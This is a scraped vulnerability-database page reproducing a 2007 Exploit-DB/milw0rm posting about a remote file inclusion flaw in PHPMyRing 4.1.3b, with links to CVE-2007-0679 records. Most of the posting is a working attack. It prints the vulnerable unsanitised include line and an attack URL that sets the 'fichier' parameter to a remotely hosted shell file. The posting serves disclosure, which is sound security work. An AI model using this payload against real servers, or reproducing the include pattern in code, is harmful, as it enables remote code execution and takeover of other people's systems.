Lucene search
AjannEDB-ID:3238HistoryJan 31, 2007 - 12:00 a.m.
PHPMyRing 4.1.3b - 'fichier' Remote File Inclusion
2007-01-3100:00:00
ajann
www.exploit-db.com
25
AI Score
7.4
Confidence
Low
*******************************************************************************
# Title : PhpMyRing <= 4.1.3b (path) Remote File Include Vulnerability
# Author : ajann
# Contact : :(
# S.Page : http://www.microniko.net/phpmyring/
# $$ : Free
*******************************************************************************
[[ERROR]]]
..
...
.....
<?
include ($fichier.".php");
?>
..
...
.....
[[ERROR]]]
[[RFI]]]
http://[target]/[path]//lang/leslangues.php?fichier=[SHELL]
Example:
//lang/leslangues.php?fichier=http://[target]/[path]/shell.x
[[/RFI]]
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2007-01-31]Related
cvelist
cvelist
CVE-2007-0679
2007-02-03 01:00:00
nvd
nvd
CVE-2007-0679
2007-02-03 01:28:00
prion
prion
Remote file inclusion
2007-02-03 01:28:00
cve
cve
CVE-2007-0679
2007-02-03 01:28:00
securityvulns
securityvulns